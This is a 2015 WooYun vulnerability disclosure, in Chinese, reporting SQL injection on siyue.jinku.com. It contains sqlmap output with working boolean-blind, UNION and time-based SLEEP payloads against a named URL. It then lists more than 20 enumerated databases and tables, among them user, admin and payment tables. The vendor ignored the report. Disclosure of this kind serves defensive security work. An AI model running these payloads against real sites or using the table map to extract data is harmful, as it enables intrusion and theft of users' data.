当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139085

漏洞标题:金库网某处存在SQL注入涉及20多个库

相关厂商:jinku.com

漏洞作者: 路人甲

提交时间:2015-09-05 12:55

修复时间:2015-09-10 12:56

公开时间:2015-09-10 12:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-05: 细节已通知厂商并且等待厂商处理中
2015-09-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://siyue.jinku.com:80/index.php/Index/slist/aid/3052 AND 6338=6338
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: http://siyue.jinku.com:80/index.php/Index/slist/aid/3052 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71746b6d71,0x554850766e4352444968,0x717a686471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://siyue.jinku.com:80/index.php/Index/slist/aid/3052 AND SLEEP(5)
---
web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://siyue.jinku.com:80/index.php/Index/slist/aid/3052 AND 6338=6338
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: http://siyue.jinku.com:80/index.php/Index/slist/aid/3052 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71746b6d71,0x554850766e4352444968,0x717a686471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://siyue.jinku.com:80/index.php/Index/slist/aid/3052 AND SLEEP(5)
---

漏洞证明:

Database: wiki
[22 tables]
+----------------------------------------------+
| wiki_attachment |
| wiki_banned |
| wiki_board |
| wiki_categorie |
| wiki_doc |
| wiki_doc_copy |
| wiki_focus |
| wiki_friendlink |
| wiki_his |
| wiki_hottag |
| wiki_lang |
| wiki_lock |
| wiki_momo |
| wiki_plugin |
| wiki_reply |
| wiki_setting |
| wiki_style |
| wiki_task |
| wiki_topic |
| wiki_user |
| wiki_user_copy |
| wiki_usergroup |
+----------------------------------------------+
Database: chat2
[6 tables]
+----------------------------------------------+
| build_chat |
| chat |
| chat_bak |
| chat_bak_copy |
| chat_copy |
| chat_roomimg |
+----------------------------------------------+
Database: salon
[3 tables]
+----------------------------------------------+
| a_title |
| a_user |
| solution |
+----------------------------------------------+
Database: match_db_bak
[8 tables]
+----------------------------------------------+
| match_admin |
| match_admintype |
| match_archives |
| match_channel |
| match_mlog |
| match_sessions |
| match_sign |
| region |
+----------------------------------------------+
Database: ecshop
[90 tables]
+----------------------------------------------+
| ecs_account_log |
| ecs_ad |
| ecs_ad_custom |
| ecs_ad_position |
| ecs_admin_action |
| ecs_admin_log |
| ecs_admin_message |
| ecs_admin_user |
| ecs_adsense |
| ecs_affiliate_log |
| ecs_agency |
| ecs_area_region |
| ecs_article |
| ecs_article_cat |
| ecs_attribute |
| ecs_auction_log |
| ecs_auto_manage |
| ecs_back_goods |
| ecs_back_order |
| ecs_bonus_type |
| ecs_booking_goods |
| ecs_brand |
| ecs_card |
| ecs_cart |
| ecs_cat_recommend |
| ecs_category |
| ecs_collect_goods |
| ecs_comment |
| ecs_crons |
| ecs_delivery_goods |
| ecs_delivery_order |
| ecs_email_list |
| ecs_email_sendlist |
| ecs_error_log |
| ecs_exchange_goods |
| ecs_favourable_activity |
| ecs_feedback |
| ecs_friend_link |
| ecs_goods |
| ecs_goods_activity |
| ecs_goods_article |
| ecs_goods_attr |
| ecs_goods_cat |
| ecs_goods_gallery |
| ecs_goods_type |
| ecs_group_goods |
| ecs_keywords |
| ecs_link_goods |
| ecs_mail_templates |
| ecs_member_price |
| ecs_nav |
| ecs_order_action |
| ecs_order_goods |
| ecs_order_info |
| ecs_pack |
| ecs_package_goods |
| ecs_pay_log |
| ecs_payment |
| ecs_payment_benfen |
| ecs_plugins |
| ecs_products |
| ecs_reg_extend_info |
| ecs_reg_fields |
| ecs_region |
| ecs_role |
| ecs_searchengine |
| ecs_sessions |
| ecs_sessions_data |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_snatch_log |
| ecs_stats |
| ecs_suppliers |
| ecs_tag |
| ecs_template |
| ecs_topic |
| ecs_user_account |
| ecs_user_address |
| ecs_user_bonus |
| ecs_user_feed |
| ecs_user_rank |
| ecs_users |
| ecs_virtual_card |
| ecs_volume_price |
| ecs_vote |
| ecs_vote_log |
| ecs_vote_option |
| ecs_wholesale |
| jinku_lottery |
+----------------------------------------------+
Database: chat
[5 tables]
+----------------------------------------------+
| build_chat |
| chat |
| chat_bak |
| chat_bak_copy |
| chat_copy |
+----------------------------------------------+
Database: mysql
[25 tables]
+----------------------------------------------+
| Temp_udf |
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: db_mjolnir
[5 tables]
+----------------------------------------------+
| t_booking |
| t_booking_item |
| t_comment |
| t_product |
| t_user |
+----------------------------------------------+
Database: match_old
[6 tables]
+----------------------------------------------+
| match_admin |
| match_admintype |
| match_archives |
| match_channel |
| match_mlog |
| match_sessions |
+----------------------------------------------+
Database: newcms
[138 tables]
+----------------------------------------------+
| dede_addoncfpafparticles_copy(20111231) |
| answer |
| ask |
| ask_type |
| ca_apply_sort |
| ca_organise |
| ca_organise_copy |
| category |
| chat |
| chat_bak |
| chat_bak_copy |
| chat_copy |
| dede_addon18 |
| dede_addon19 |
| dede_addon20 |
| dede_addon21 |
| dede_addon_hkt |
| dede_addonarticle |
| dede_addonarticle15 |
| dede_addonarticle16 |
| dede_addonarticle_copy |
| dede_addoncfpafparticles |
| dede_addonflash |
| dede_addonimages |
| dede_addoninfos |
| dede_addonproduct |
| dede_addonsoft |
| dede_addonspec |
| dede_admin |
| dede_admintype |
| dede_arc_code |
| dede_arcatt |
| dede_archives |
| dede_archives15 |
| dede_archives16 |
| dede_archives18 |
| dede_archives19 |
| dede_archives20 |
| dede_archives21 |
| dede_archivesspec |
| dede_arcrank |
| dede_arctype |
| dede_arctype_copy |
| dede_arctype_copy2 |
| dede_arctype_copy3 |
| dede_area |
| dede_ask |
| dede_askanswer |
| dede_asktype |
| dede_cache_feedbackurl |
| dede_cache_tagindex |
| dede_cache_value |
| dede_cfpafparticles |
| dede_channeltype |
| dede_co_exrule |
| dede_co_listenurl |
| dede_co_mediaurl |
| dede_conote |
| dede_courl |
| dede_error |
| dede_feedback |
| dede_flink |
| dede_flinkchannel |
| dede_flinktype |
| dede_freelist |
| dede_friends |
| dede_full_search |
| dede_full_search_copy |
| dede_group_guestbook |
| dede_group_notice |
| dede_group_posts |
| dede_group_smalltypes |
| dede_group_threads |
| dede_group_user |
| dede_groups |
| dede_guestbook |
| dede_homepageset |
| dede_infos |
| dede_jobs |
| dede_keywords |
| dede_log |
| dede_member |
| dede_member_arctype |
| dede_member_cominfo |
| dede_member_flink |
| dede_member_guestbook |
| dede_member_operation |
| dede_member_perinfo |
| dede_member_time |
| dede_member_type |
| dede_memberstow |
| dede_modules |
| dede_moneycard_record |
| dede_moneycard_type |
| dede_moneyrecord |
| dede_myad |
| dede_mynews |
| dede_mytag |
| dede_orders |
| dede_plus |
| dede_pms |
| dede_score2money_logs |
| dede_scores |
| dede_search_cache |
| dede_search_keywords |
| dede_search_rule |
| dede_sectors |
| dede_sgpage |
| dede_sitemap |
| dede_smalltypes |
| dede_softconfig |
| dede_store_groups |
| dede_story_books |
| dede_story_catalog |
| dede_story_chapter |
| dede_story_content |
| dede_story_viphistory |
| dede_sysconfig |
| dede_syspassport |
| dede_tag_index |
| dede_tag_list |
| dede_task |
| dede_uploads |
| dede_vote |
| new_grade |
| newfeedback |
| news_push |
| news_topic |
| poll_item |
| poll_item_copy |
| poll_question |
| poll_question_copy |
| poll_result |
| poll_result_copy |
| poll_subject |
| poll_subject_copy |
| search_counter |
| up_avd |
+----------------------------------------------+
Database: question
[7 tables]
+----------------------------------------------+
| system_manage |
| zd_answer |
| zd_asksort |
| zd_keyword |
| zd_member |
| zd_question |
| zd_topic |
+----------------------------------------------+
Database: test
[6 tables]
+----------------------------------------------+
| cdb_postrate |
| club_user_info |
| gfbisai |
| sso_user |
| sso_user2 |
| username |
+----------------------------------------------+
Database: czbisai
[6 tables]
+----------------------------------------------+
| attachment |
| comment |
| manager |
| player |
| subject |
| vote |
+----------------------------------------------+
Database: bbs_blog
[289 tables]
+----------------------------------------------+
| _cdb_members_copy |
| _cdb_members_copy20081112 |
| _cdb_threads_copy |
| _cdb_threads_copy2 |
| _cdb_threads_tmp |
| _cdb_threads_tmp2 |
| ace_fengcai |
| asso_user_copy1 |
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_adminactions |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banklist |
| cdb_banklist2 |
| cdb_banklog |
| cdb_banklog2 |
| cdb_bankoperation |
| cdb_bankoperation2 |
| cdb_banned |
| cdb_bbcodes |
| cdb_buddys |
| cdb_buddys_grades |
| cdb_buddys_pre |
| cdb_buddysx |
| cdb_caches |
| cdb_campaigns |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favorites |
| cdb_favorites2 |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_members |
| cdb_members_14 |
| cdb_members_20120504 |
| cdb_members_copy11111 |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mythreads |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_pms |
| cdb_pmsearchindex |
| cdb_polloptions |
| cdb_polls |
| cdb_postrate |
| cdb_posts |
| cdb_posts3 |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_ques_option |
| cdb_ques_result |
| cdb_ques_topic |
| cdb_ques_user |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_tags |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_videos |
| cdb_videotags |
| cdb_words |
| cdb_xreports |
| hd_list |
| jk_jzinfo |
| sso_user_copy1 |
| supe_ads |
| supe_announcements |
| supe_attachments |
| supe_attachmenttypes |
| supe_blocks |
| supe_cache |
| supe_cache_0 |
| supe_cache_1 |
| supe_cache_2 |
| supe_cache_3 |
| supe_cache_4 |
| supe_cache_5 |
| supe_cache_6 |
| supe_cache_7 |
| supe_cache_8 |
| supe_cache_9 |
| supe_cache_a |
| supe_cache_b |
| supe_cache_c |
| supe_cache_d |
| supe_cache_e |
| supe_cache_f |
| supe_categories |
| supe_channels |
| supe_corpus |
| supe_crons |
| supe_customfields |
| supe_effects |
| supe_favorites |
| supe_friendlinks |
| supe_friends |
| supe_goodsprice |
| supe_groupfields |
| supe_groupinvite |
| supe_groupitems |
| supe_groups |
| supe_groupuid |
| supe_guestbooks |
| supe_hrcategories |
| supe_hrcomments |
| supe_hrfolders |
| supe_hritems |
| supe_hrmessage |
| supe_hrrates |
| supe_itemtypes |
| supe_lovecategories |
| supe_lovecomments |
| supe_lovefolders |
| supe_loveitems |
| supe_lovemessage |
| supe_loverates |
| supe_members |
| supe_members_copy |
| supe_members_copy1111 |
| supe_modelcolumns |
| supe_modelinterval |
| supe_modelperm |
| supe_models |
| supe_moviecategories |
| supe_moviecomments |
| supe_moviefolders |
| supe_movieitems |
| supe_moviemessage |
| supe_movierates |
| supe_partycategories |
| supe_partycomments |
| supe_partyfolders |
| supe_partyitems |
| supe_partymessage |
| supe_partyrates |
| supe_polls |
| supe_prefields |
| supe_reports |
| supe_robotitems |
| supe_robotlog |
| supe_robotmessages |
| supe_robots |
| supe_rss |
| supe_settings |
| supe_sitemaplogs |
| supe_spaceblogs |
| supe_spacecache |
| supe_spacecache10 |
| supe_spacecache101 |
| supe_spacecache102 |
| supe_spacecache103 |
| supe_spacecache104 |
| supe_spacecache105 |
| supe_spacecache106 |
| supe_spacecache107 |
| supe_spacecache108 |
| supe_spacecache109 |
| supe_spacecache11 |
| supe_spacecache110 |
| supe_spacecache111 |
| supe_spacecache112 |
| supe_spacecache113 |
| supe_spacecache114 |
| supe_spacecache12 |
| supe_spacecache13 |
| supe_spacecache14 |
| supe_spacecache15 |
| supe_spacecache16 |
| supe_spacecache17 |
| supe_spacecache18 |
| supe_spacecache19 |
| supe_spacecache2 |
| supe_spacecache20 |
| supe_spacecache201 |
| supe_spacecache21 |
| supe_spacecache22 |
| supe_spacecache23 |
| supe_spacecache24 |
| supe_spacecache25 |
| supe_spacecache3 |
| supe_spacecache4 |
| supe_spacecache5 |
| supe_spacecache6 |
| supe_spacecache7 |
| supe_spacecache8 |
| supe_spacecache88889 |
| supe_spacecache9 |
| supe_spacecomments |
| supe_spacefiles |
| supe_spacegoods |
| supe_spaceimages |
| supe_spaceitems |
| supe_spacelinks |
| supe_spacenews |
| supe_spacetags |
| supe_spacevideos |
| supe_styles |
| supe_tagcache |
| supe_tagcache_0 |
| supe_tagcache_1 |
| supe_tagcache_2 |
| supe_tagcache_3 |
| supe_tagcache_4 |
| supe_tagcache_5 |
| supe_tagcache_6 |
| supe_tagcache_7 |
| supe_tagcache_8 |
| supe_tagcache_9 |
| supe_tagcache_a |
| supe_tagcache_b |
| supe_tagcache_c |
| supe_tagcache_d |
| supe_tagcache_e |
| supe_tagcache_f |
| supe_tags |
| supe_topicelements |
| supe_topics |
| supe_tracks |
| supe_usercss |
| supe_userfields |
| supe_usergroups |
| supe_userlinks |
| supe_userprofile |
| supe_userspacefields |
| supe_userspaces |
| supe_visitors |
| supe_words |
| tm_log |
| tm_online |
| uc_useractions |
+----------------------------------------------+
Database: club
[75 tables]
+----------------------------------------------+
| ca_user_data_3-2 |
| ca_user_data_7.1 |
| ca_user_info_7.1 |
| ca_admin_user |
| ca_album_comment |
| ca_apply_sort |
| ca_article |
| ca_article_class |
| ca_bulletin |
| ca_bulletin_type |
| ca_class_info |
| ca_class_msg |
| ca_class_share_0 |
| ca_class_share_1 |
| ca_class_share_2 |
| ca_class_share_3 |
| ca_class_share_4 |
| ca_class_share_5 |
| ca_class_share_6 |
| ca_class_share_7 |
| ca_class_share_8 |
| ca_class_share_9 |
| ca_class_type |
| ca_edu |
| ca_edu_exam |
| ca_edu_read |
| ca_edu_user_read |
| ca_edu_user_read_copy |
| ca_exam_option |
| ca_exercise |
| ca_exercise_project |
| ca_family_album |
| ca_family_share |
| ca_first_login |
| ca_new_user |
| ca_new_user_bak |
| ca_new_user_in_class |
| ca_organise |
| ca_project_attach |
| ca_project_comment |
| ca_setting |
| ca_share_comment |
| ca_user_csv |
| ca_user_data |
| ca_user_data_copy |
| ca_user_data_copy32 |
| ca_user_in_class |
| ca_user_in_edu |
| ca_user_in_survey |
| ca_user_in_survey_copy |
| ca_user_info |
| ca_user_info2 |
| ca_user_info_7_copy |
| ca_user_info_copy |
| ca_user_info_copy1 |
| ca_user_info_copy20131104 |
| ca_user_type |
| cdb_buddys |
| cdb_favorites |
| gfbisai |
| new_czr |
| renzheng |
| supe_favorites |
| temp |
| tempuid |
| uc_call |
| uc_manager |
| uc_usermeet |
| uc_vol_in_um |
| uc_volunteer |
| uc_volunteer_xls |
| uc_xuefen_record |
| uc_xuefen_tongxunlu |
| uc_xuefen_tongxunlu_copy |
| uc_xuefen_xls |
+----------------------------------------------+
Database: mail_sender
[8 tables]
+----------------------------------------------+
| customer_info |
| deleted_customer_info |
| mission_list |
| mission_list_ |
| missions |
| missions_ |
| missions_end |
| region |
+----------------------------------------------+
Database: ask
[13 tables]
+----------------------------------------------+
| ask |
| ask_copy |
| ask_sort |
| keyword |
| match_admin |
| match_admintype |
| match_archives |
| match_channel |
| match_mlog |
| match_question |
| match_sessions |
| match_sign |
| rejoin |
+----------------------------------------------+
Database: topd
[6 tables]
+----------------------------------------------+
| tpd_activity |
| tpd_adminuser |
| tpd_mlog |
| tpd_saveas |
| tpd_sessions |
| tpd_sign |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: signs
[12 tables]
+----------------------------------------------+
| b_body |
| s_admin |
| s_data |
| s_form |
| s_retion |
| s_retion_b |
| s_seat |
| s_seat2010 |
| s_sort |
| s_sort_bak |
| s_ticket |
| s_volunteers |
+----------------------------------------------+
Database: acr
[1 table]
+----------------------------------------------+
| _cdb_threads_copy |
+----------------------------------------------+
Database: magazine
[21 tables]
+----------------------------------------------+
| mag_adminuser |
| mag_article |
| mag_article_del |
| mag_author |
| mag_author_del |
| mag_column |
| mag_comment |
| mag_customer |
| mag_files |
| mag_mlog |
| mag_order2 |
| mag_order2_20120207 |
| mag_order2_copy |
| mag_order2_copy_0110 |
| mag_order2_del |
| mag_publish |
| mag_samplemag |
| mag_saveas |
| mag_sessions |
| mag_ship |
| mag_ulog |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+
Database: match
[17 tables]
+----------------------------------------------+
| match_admin |
| match_admintype |
| match_archives |
| match_channel |
| match_mlog |
| match_question |
| match_sessions |
| match_sign |
| match_sign_copy |
| match_sign_copy1 |
| match_sign_copy2 |
| match_sign_copy3 |
| match_sign_copy4 |
| match_sign_copy55 |
| match_test |
| match_test_copy |
| region |
+----------------------------------------------+
Database: zixun
[8 tables]
+----------------------------------------------+
| a_look |
| a_redu |
| a_relay |
| a_share |
| article |
| member |
| part |
| posts |
+----------------------------------------------+

修复方案:

rt

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-10 12:56

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论